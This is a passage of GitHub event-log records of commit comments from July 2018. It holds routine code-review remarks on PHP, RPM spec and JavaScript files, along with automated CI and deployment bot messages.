{"id":"7950318054","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671704,"position":27,"line":19,"path":"src/Algorithms/Min.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:06:01Z","updated_at":"2018-07-11T14:06:01Z","author_association":"CONTRIBUTOR","body":"It has the same issue in the previous comment."}},"created_at":"2018-07-11T14:06:01Z"}
{"id":"7950318915","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671706,"position":31,"line":23,"path":"src/Algorithms/Min.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:06:10Z","updated_at":"2018-07-11T14:06:10Z","author_association":"CONTRIBUTOR","body":"Missing EOF."}},"created_at":"2018-07-11T14:06:10Z"}
{"id":"7950321512","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671713,"position":25,"line":21,"path":"src/Algorithms/Pick.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:06:32Z","updated_at":"2018-07-11T14:06:32Z","author_association":"CONTRIBUTOR","body":"It has the same issue in the previous comment."}},"created_at":"2018-07-11T14:06:32Z"}
{"id":"7950323543","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29671715,"position":null,"line":null,"path":null,"commit_id":"838ef7adacc4a3f7f7d5ccc4afe8c5799cbad5f1","created_at":"2018-07-11T14:06:50Z","updated_at":"2018-07-11T14:06:50Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](https://c6c1d08a.ngrok.io/ui#review:id=378)"}},"created_at":"2018-07-11T14:06:50Z"}
{"id":"7950323688","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29671716,"position":null,"line":null,"path":null,"commit_id":"325450548256bf7e01102a756c1a316fbac273ce","created_at":"2018-07-11T14:06:51Z","updated_at":"2018-07-11T14:06:51Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](https://c6c1d08a.ngrok.io/ui#review:id=378)"}},"created_at":"2018-07-11T14:06:51Z"}
{"id":"7950323773","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29671717,"position":null,"line":null,"path":null,"commit_id":"05ae420ddb7a611bbcfc93ec5a375cdf5505ac38","created_at":"2018-07-11T14:06:52Z","updated_at":"2018-07-11T14:06:52Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](https://c6c1d08a.ngrok.io/ui#review:id=378)"}},"created_at":"2018-07-11T14:06:52Z"}
{"id":"7950323829","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29671718,"position":null,"line":null,"path":null,"commit_id":"f6e78a5295998f761000465d9fe7653171f8377b","created_at":"2018-07-11T14:06:53Z","updated_at":"2018-07-11T14:06:53Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](https://c6c1d08a.ngrok.io/ui#review:id=378)"}},"created_at":"2018-07-11T14:06:53Z"}
{"id":"7950323911","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29671719,"position":null,"line":null,"path":null,"commit_id":"e665a18fe81c6ef265cf0a1c102792166b8862e2","created_at":"2018-07-11T14:06:53Z","updated_at":"2018-07-11T14:06:53Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](https://c6c1d08a.ngrok.io/ui#review:id=378)"}},"created_at":"2018-07-11T14:06:53Z"}
{"id":"7950324619","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671721,"position":11,"line":21,"path":"src/Algorithms/Reject.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:07:00Z","updated_at":"2018-07-11T14:07:00Z","author_association":"CONTRIBUTOR","body":"It has the same issue in the previous comment I mention."}},"created_at":"2018-07-11T14:07:00Z"}
{"id":"7950325491","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671726,"position":21,"line":25,"path":"src/Algorithms/Reject.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:07:09Z","updated_at":"2018-07-11T14:07:09Z","author_association":"CONTRIBUTOR","body":"Missing EOF."}},"created_at":"2018-07-11T14:07:09Z"}
{"id":"7950326878","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671730,"position":31,"line":27,"path":"src/Algorithms/Unique.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:07:22Z","updated_at":"2018-07-11T14:07:22Z","author_association":"CONTRIBUTOR","body":"Missing EOF."}},"created_at":"2018-07-11T14:07:22Z"}
{"id":"7950331038","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671743,"position":28,"line":23,"path":"src/Algorithms/DropLeft.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:08:00Z","updated_at":"2018-07-11T14:08:00Z","author_association":"CONTRIBUTOR","body":"That's right."}},"created_at":"2018-07-11T14:08:00Z"}
{"id":"7950331725","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.05_06"},"payload":{"comment":{"id":29671746,"position":null,"line":null,"path":null,"commit_id":"6a1f835b0220b2ddd991042cf7fedd39239e2462","created_at":"2018-07-11T14:08:07Z","updated_at":"2018-07-11T14:08:07Z","author_association":"NONE","body":"в этой задаче, я считаю, что массив в этой задаче совершенно не нужен, тип notation проситься как private или internal"}},"created_at":"2018-07-11T14:08:07Z"}
{"id":"7950332897","type":"CommitCommentEvent","actor":{"login":"vulovicm"},"repo":{"name":"filipKuz/eLearning"},"payload":{"comment":{"id":29671750,"position":null,"line":null,"path":null,"commit_id":"b5142cf1968c59385dd1070abea5cb96250ca0c8","created_at":"2018-07-11T14:08:17Z","updated_at":"2018-07-11T14:08:17Z","author_association":"COLLABORATOR","body":"hahahaha morao sam ovako...nije hteo @query da mi radi :/"}},"created_at":"2018-07-11T14:08:17Z"}
{"id":"7950338428","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29671765,"position":null,"line":null,"path":null,"commit_id":"986abe4f71b6e0026e48bdf8b5bfab3e907957aa","created_at":"2018-07-11T14:09:10Z","updated_at":"2018-07-11T14:09:10Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-140908 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-140908\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T14:09:10Z"}
{"id":"7950339621","type":"CommitCommentEvent","actor":{"login":"rapicastillo"},"repo":{"name":"ProgressiveHackNight/proghacknight.org"},"payload":{"comment":{"id":29671768,"position":10,"line":10,"path":"_posts/events/2018-07-17-reboot-democracy-worknight.md","commit_id":"07fd844c44d188e57926cc1e126f68b623bdd4ae","created_at":"2018-07-11T14:09:20Z","updated_at":"2018-07-11T14:09:20Z","author_association":"NONE","body":"@ibrand I think this should be 2018-07-17"}},"created_at":"2018-07-11T14:09:20Z"}
{"id":"7950340564","type":"CommitCommentEvent","actor":{"login":"paddu-tumuluri"},"repo":{"name":"paddu-tumuluri/igdm"},"payload":{"comment":{"id":29671770,"position":7,"line":14,"path":"CONTRIBUTORS","commit_id":"8bf5f0d8bab40af15b07d31a6b3c0719796dd9fd","created_at":"2018-07-11T14:09:29Z","updated_at":"2018-07-11T14:09:29Z","author_association":"OWNER","body":"Add my email -\r\npadmini<paddutumuluri@gmail.com>"}},"created_at":"2018-07-11T14:09:29Z"}
{"id":"7950340713","type":"CommitCommentEvent","actor":{"login":"rapicastillo"},"repo":{"name":"ProgressiveHackNight/proghacknight.org"},"payload":{"comment":{"id":29671772,"position":11,"line":11,"path":"_posts/events/2018-07-17-reboot-democracy-worknight.md","commit_id":"07fd844c44d188e57926cc1e126f68b623bdd4ae","created_at":"2018-07-11T14:09:30Z","updated_at":"2018-07-11T14:09:30Z","author_association":"NONE","body":"Also, this should be 33 / 32?"}},"created_at":"2018-07-11T14:09:30Z"}
{"id":"7950342063","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29671773,"position":null,"line":null,"path":null,"commit_id":"600509e5a3dfe9e2039c521dcef365b8d2f3cc5f","created_at":"2018-07-11T14:09:43Z","updated_at":"2018-07-11T14:09:43Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](https://c6c1d08a.ngrok.io/ui#review:id=379)"}},"created_at":"2018-07-11T14:09:43Z"}
{"id":"7950342841","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29671775,"position":null,"line":null,"path":null,"commit_id":"58596040f2797eec925f84e7d05389aecfa1ebc7","created_at":"2018-07-11T14:09:50Z","updated_at":"2018-07-11T14:09:50Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-275](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-275).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-275-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-11T14:09:50Z"}
{"id":"7950347218","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29671781,"position":null,"line":null,"path":null,"commit_id":"f61183cb3adbd9fc35376a2aaea2847857f8db6e","created_at":"2018-07-11T14:10:29Z","updated_at":"2018-07-11T14:10:29Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2311 of 2311 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f61183cb3adbd9fc35376a2aaea2847857f8db6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f61183cb3adbd9fc35376a2aaea2847857f8db6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f61183cb3adbd9fc35376a2aaea2847857f8db6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-11T14:10:29Z"}
{"id":"7950352185","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29671789,"position":null,"line":null,"path":null,"commit_id":"1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd","created_at":"2018-07-11T14:11:16Z","updated_at":"2018-07-11T14:11:16Z","author_association":"NONE","body":"issue_6736 (mbadams5) - x86_64-MacOS-10.9-clang: OK (2933 of 2933 tests passed, 114 test warnings)\n\nMessages:\n\n * 97 tests had: AUD diffs.\n * 2 tests had: ERR diffs.\n * 16 tests had: Table small diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T14:11:16Z"}
{"id":"7950354459","type":"CommitCommentEvent","actor":{"login":"jckautzmann"},"repo":{"name":"Adobe-Marketing-Cloud/aem-core-wcm-components"},"payload":{"comment":{"id":29671796,"position":29,"line":29,"path":"content/src/content/jcr_root/apps/core/wcm/sandbox/commons/ui/clientlibs/js/model/PanelContainer.js","commit_id":"2da19664f6f7286bcfb1bf5d723d1e8142c16036","created_at":"2018-07-11T14:11:36Z","updated_at":"2018-07-11T14:11:36Z","author_association":"CONTRIBUTOR","body":"Shouldn't it be: Gets (present form)?"}},"created_at":"2018-07-11T14:11:36Z"}
{"id":"7950355861","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29671799,"position":null,"line":null,"path":null,"commit_id":"f61183cb3adbd9fc35376a2aaea2847857f8db6e","created_at":"2018-07-11T14:11:50Z","updated_at":"2018-07-11T14:11:50Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f61183cb3adbd9fc35376a2aaea2847857f8db6e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-11T14:11:50Z"}
{"id":"7950357357","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29671800,"position":20,"line":25,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T14:12:04Z","updated_at":"2018-07-11T14:12:04Z","author_association":"MEMBER","body":"use rpm-helper"}},"created_at":"2018-07-11T14:12:04Z"}
{"id":"7950358576","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29671802,"position":null,"line":null,"path":null,"commit_id":"2fa0917f84c82b59d8282f6f9f276a9c8860449b","created_at":"2018-07-11T14:12:15Z","updated_at":"2018-07-11T14:12:15Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](https://c6c1d08a.ngrok.io/ui#review:id=380)"}},"created_at":"2018-07-11T14:12:15Z"}
{"id":"7950359006","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29671805,"position":21,"line":26,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T14:12:18Z","updated_at":"2018-07-11T14:12:18Z","author_association":"MEMBER","body":"use rpm-helper"}},"created_at":"2018-07-11T14:12:18Z"}
{"id":"7950360364","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29671808,"position":44,"line":4929,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"609271bc684c6529ca1c063378dca5aeb6a081b9","created_at":"2018-07-11T14:12:31Z","updated_at":"2018-07-11T14:12:31Z","author_association":"COLLABORATOR","body":"Müstemleke? Sömürge too maybe"}},"created_at":"2018-07-11T14:12:31Z"}
{"id":"7950361048","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"mozilla-releng/shipit-v2"},"payload":{"comment":{"id":29671810,"position":null,"line":null,"path":null,"commit_id":"0e33a41c7d296848274d5a4e64b1767f39790875","created_at":"2018-07-11T14:12:37Z","updated_at":"2018-07-11T14:12:37Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/queue/v1/create-task-request.json#\nErrors:\n  * data should NOT have additional properties: \"artifacts\"\n\n---\n\n* method:     createTask\n* errorCode:  InputValidationError\n* statusCode: 400\n* time:       2018-07-11T14:12:37.623Z\n\n</details>"}},"created_at":"2018-07-11T14:12:37Z"}
{"id":"7950361527","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29671811,"position":36,"line":51,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T14:12:42Z","updated_at":"2018-07-11T14:12:42Z","author_association":"MEMBER","body":"use %{_systemunitdir}\r\nand add br on systemd"}},"created_at":"2018-07-11T14:12:42Z"}
{"id":"7950363572","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29671817,"position":67,"line":80,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T14:13:00Z","updated_at":"2018-07-11T14:13:00Z","author_association":"MEMBER","body":"use %{_systemunitdir}"}},"created_at":"2018-07-11T14:13:00Z"}
{"id":"7950364144","type":"CommitCommentEvent","actor":{"login":"jckautzmann"},"repo":{"name":"Adobe-Marketing-Cloud/aem-core-wcm-components"},"payload":{"comment":{"id":29671819,"position":47,"line":47,"path":"content/src/content/jcr_root/apps/core/wcm/sandbox/commons/ui/clientlibs/js/model/PanelContainer.js","commit_id":"2da19664f6f7286bcfb1bf5d723d1e8142c16036","created_at":"2018-07-11T14:13:06Z","updated_at":"2018-07-11T14:13:06Z","author_association":"CONTRIBUTOR","body":"Shouldn't it be: Returns the path... ?"}},"created_at":"2018-07-11T14:13:06Z"}
{"id":"7950364374","type":"CommitCommentEvent","actor":{"login":"wolfc"},"repo":{"name":"iweiss/fuse-karaf"},"payload":{"comment":{"id":29671820,"position":27,"line":96,"path":"pom.xml","commit_id":"cded66177029f540e222625cf2b60b1ea2bed17b","created_at":"2018-07-11T14:13:09Z","updated_at":"2018-07-11T14:13:09Z","author_association":"NONE","body":"Imported dependency management does.\r\n\r\nWe also need to reconsider EAP BOM vs Runtimes BOM."}},"created_at":"2018-07-11T14:13:09Z"}
{"id":"7950366060","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29671821,"position":44,"line":61,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T14:13:23Z","updated_at":"2018-07-11T14:13:23Z","author_association":"MEMBER","body":"whole post is not needed"}},"created_at":"2018-07-11T14:13:23Z"}
{"id":"7950366403","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"davidanthoff/TableTraits.jl"},"payload":{"comment":{"id":29671822,"position":20,"line":16,"path":"src/TableTraits.jl","commit_id":"b54357df24aea0a3e11b3e538d91759049efeabb","created_at":"2018-07-11T14:13:26Z","updated_at":"2018-07-11T14:13:26Z","author_association":"NONE","body":"What's the reasoning for returning `missing` here? Is there special downstream behavior where an iterator has `EltypeUnknown()`?"}},"created_at":"2018-07-11T14:13:26Z"}
{"id":"7950368856","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29671828,"position":49,"line":65,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T14:13:49Z","updated_at":"2018-07-11T14:13:49Z","author_association":"MEMBER","body":"whole preun is not neede, honestly scriplets are not needed"}},"created_at":"2018-07-11T14:13:49Z"}
{"id":"7950370764","type":"CommitCommentEvent","actor":{"login":"jckautzmann"},"repo":{"name":"Adobe-Marketing-Cloud/aem-core-wcm-components"},"payload":{"comment":{"id":29671830,"position":62,"line":62,"path":"content/src/content/jcr_root/apps/core/wcm/sandbox/commons/ui/clientlibs/js/model/PanelContainer.js","commit_id":"2da19664f6f7286bcfb1bf5d723d1e8142c16036","created_at":"2018-07-11T14:14:07Z","updated_at":"2018-07-11T14:14:07Z","author_association":"CONTRIBUTOR","body":"I'd remane the argument `ordered`."}},"created_at":"2018-07-11T14:14:07Z"}
{"id":"7950373998","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29671837,"position":null,"line":null,"path":null,"commit_id":"69c0902970711a047f2a8821b84d2f8ae9a03ec5","created_at":"2018-07-11T14:14:36Z","updated_at":"2018-07-11T14:14:36Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-117](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-117).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-117-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-11T14:14:36Z"}
{"id":"7950374684","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29671839,"position":37,"line":52,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T14:14:43Z","updated_at":"2018-07-11T14:14:43Z","author_association":"MEMBER","body":"add this line\r\ninstall -d %{buildroot}%{_presetdir}\r\ncat > %{buildroot}%{_presetdir}/86-%{name}.preset << EOF\r\nenable supervisord.service\r\nEOF"}},"created_at":"2018-07-11T14:14:43Z"}
{"id":"7950377112","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29671840,"position":11,"line":18,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T14:15:06Z","updated_at":"2018-07-11T14:15:06Z","author_association":"MEMBER","body":"not needed"}},"created_at":"2018-07-11T14:15:06Z"}
{"id":"7950378876","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29671843,"position":13,"line":20,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T14:15:21Z","updated_at":"2018-07-11T14:15:21Z","author_association":"MEMBER","body":"use pkgconfig"}},"created_at":"2018-07-11T14:15:21Z"}
{"id":"7950380001","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29671845,"position":14,"line":21,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T14:15:32Z","updated_at":"2018-07-11T14:15:32Z","author_association":"MEMBER","body":"add br on systemd"}},"created_at":"2018-07-11T14:15:32Z"}
{"id":"7950380284","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"mozilla-releng/shipit-v2"},"payload":{"comment":{"id":29671847,"position":null,"line":null,"path":null,"commit_id":"1f069f834719626ab1c75d85ac8abe4f5e3b4788","created_at":"2018-07-11T14:15:34Z","updated_at":"2018-07-11T14:15:34Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/queue/v1/create-task-request.json#\nErrors:\n  * data should NOT have additional properties: \"artifacts\"\n\n---\n\n* method:     createTask\n* errorCode:  InputValidationError\n* statusCode: 400\n* time:       2018-07-11T14:15:34.587Z\n\n</details>"}},"created_at":"2018-07-11T14:15:34Z"}
{"id":"7950383874","type":"CommitCommentEvent","actor":{"login":"jckautzmann"},"repo":{"name":"Adobe-Marketing-Cloud/aem-core-wcm-components"},"payload":{"comment":{"id":29671851,"position":67,"line":67,"path":"content/src/content/jcr_root/apps/core/wcm/sandbox/commons/ui/clientlibs/js/model/PanelContainer.js","commit_id":"2da19664f6f7286bcfb1bf5d723d1e8142c16036","created_at":"2018-07-11T14:16:09Z","updated_at":"2018-07-11T14:16:09Z","author_association":"CONTRIBUTOR","body":"For each action, we could have a dedicated function:\r\n- delete: function(deleted)\r\n- create: function(created)\r\n- delete: function(deleted)"}},"created_at":"2018-07-11T14:16:09Z"}
{"id":"7950383880","type":"CommitCommentEvent","actor":{"login":"BjoernLudwigPTB"},"repo":{"name":"Met4FoF/Code"},"payload":{"comment":{"id":29671852,"position":8,"line":25,"path":"README.md","commit_id":"4d2d73ae260533a5cb3bb7a2786751047ae02efd","created_at":"2018-07-11T14:16:09Z","updated_at":"2018-07-11T14:16:09Z","author_association":"CONTRIBUTOR","body":"Here the wiki is introduced where I plan to add further information not to overload the README.md where I then only want to introduce the most important features."}},"created_at":"2018-07-11T14:16:09Z"}
{"id":"7950387178","type":"CommitCommentEvent","actor":{"login":"fariouche"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29671857,"position":null,"line":null,"path":null,"commit_id":"418f36bba19bc28fd09c360f5e49d07529ed554e","created_at":"2018-07-11T14:16:39Z","updated_at":"2018-07-11T14:16:39Z","author_association":"OWNER","body":"please have a look at my 5.2.20 branch. I've added the 8814 but cannot test since I do not have any 8814 device.\r\nThe compilation and insmod should work, detection of the 8814 too.... but it may not work... kernel panic is possible, or hostapd not able to talk.\r\nYou will need to check the dmesg output for errors if no crash"}},"created_at":"2018-07-11T14:16:39Z"}
{"id":"7950394121","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29671865,"position":42,"line":59,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T14:17:41Z","updated_at":"2018-07-11T14:17:41Z","author_association":"MEMBER","body":"remove it"}},"created_at":"2018-07-11T14:17:41Z"}
{"id":"7950394417","type":"CommitCommentEvent","actor":{"login":"Teofanovic"},"repo":{"name":"filipKuz/eLearning"},"payload":{"comment":{"id":29671866,"position":null,"line":null,"path":null,"commit_id":"b5142cf1968c59385dd1070abea5cb96250ca0c8","created_at":"2018-07-11T14:17:43Z","updated_at":"2018-07-11T14:17:43Z","author_association":"COLLABORATOR","body":"Opušteno :)"}},"created_at":"2018-07-11T14:17:43Z"}
{"id":"7950395502","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29671868,"position":59,"line":73,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T14:17:53Z","updated_at":"2018-07-11T14:17:53Z","author_association":"MEMBER","body":"remove it"}},"created_at":"2018-07-11T14:17:53Z"}
{"id":"7950397663","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29671871,"position":null,"line":null,"path":null,"commit_id":"6c6e48a52587df105595ce7893602c93a829992f","created_at":"2018-07-11T14:18:13Z","updated_at":"2018-07-11T14:18:13Z","author_association":"COLLABORATOR","body":"Shall I make a design issue for your point \"We can later decide which things define new scopes (such as `DataDefinition`s), and make it an error to scope something to an element which does not in fact define a scope.\"?\r\n*** \r\nAlso, was something similar to the following more close to what you're looking for : 195abfc?"}},"created_at":"2018-07-11T14:18:13Z"}
{"id":"7950398817","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29671876,"position":null,"line":null,"path":null,"commit_id":"28f82842825ccc271ef88d4c1d908d743effa1e7","created_at":"2018-07-11T14:18:22Z","updated_at":"2018-07-11T14:18:22Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-141821 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-141821\") to 